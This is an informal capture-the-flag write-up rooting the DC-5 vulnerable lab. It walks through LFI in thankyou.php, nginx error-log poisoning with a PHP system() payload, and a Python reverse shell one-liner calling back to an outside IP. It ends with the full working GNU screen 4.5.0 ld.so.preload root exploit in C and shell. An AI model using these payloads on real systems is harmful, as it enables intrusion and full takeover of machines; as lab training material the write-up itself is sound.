DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).
As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.
And just for the record, there is no phpmailer exploit involved. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Thu May 27 05:45:51 2021 as: nmap -sC -p- -sV -oA nmap 172.16.139.185
Nmap scan report for DC-5 (172.16.139.185)
Host is up (0.0015s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 47835/udp status
| 100024 1 51334/udp6 status
| 100024 1 52216/tcp status
|_ 100024 1 54172/tcp6 status
52216/tcp open status 1 (RPC #100024)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 27 05:46:08 2021 -- 1 IP address (1 host up) scanned in 16.99 seconds
Scanning for full ports give us 3 open port but since the lab only focus on the port 80 HTTP let hit it to start enumerating.
We are on the webpage let look around and find something vulnerable spend sometime checking so i landed on the contact page.
Let try to contact them and also checking for sql injection but nop not the way in so checking the url we have after sending them a mail.
http://172.16.139.186/thankyou.php?firstname=&lastname=&country=australia&subject= looking like LFI right?? sound interesting.
Not going to lie getting the right parameter is a really pain but guess what we learn everyday it something simple but my mind was not set there at all so let continue.
http://172.16.139.186/thankyou.php?file=/etc/passwd here the right parameter is file probably by guessing to took me long.
LFI To SHELL Through Log Poisoning
We know our web server is Nginx so to poison it is easy since we know the path with the help of little research from google.
let intercept our request with burp and send it to the repeater tab in burp <?php system ($_GET['rev']) ?>
Let confirm it if we poisoning it http://172.16.139.186/thankyou.php?file=/var/log/nginx/error.log
Boom defintely we do let run some command back to our burp /var/log/nginx/error.log&rev=ls the path am talking about with a little twist that we added to poison the web server.
Getting Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
NOTE:- edit the port and IP and also start an Ncat listener now let run it to get our shell.
Shell below;
Spawning a TTY shell making shell stable also to make so cool to use i know i love using the words cool lol .
python -c'import pty; pty.spawn ("/bin/bash")' and i think we are good to go.
Checking all folder found nothing so i decided to check for SUID with find / -perm -u=s -type f 2>/dev/null to list out SUID files.
Seems we have /bin/screen-4.5.0 let check for exploit.
Nice.
Privilege Escalation
We have to do now is to create the exploit we have already but we some fixing to do.
Now let do the right thing.
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
Let save it in a file name exploit.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
Let save in a file name rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
Let save it in a file name root.sh
Now we need to compile it.
gcc -fPIC -shared -ldl -o libhax.so exploit.c
gcc -o rootshell rootshell.c
Now let upload it on the target.
We have all files on the target now let give the file with the name root.sh permission chmod +x root.sh now let run it.
Rooooooooooooooooooot let now get the flag.txt.
Box rooted and we are done.
Greeting From Muzec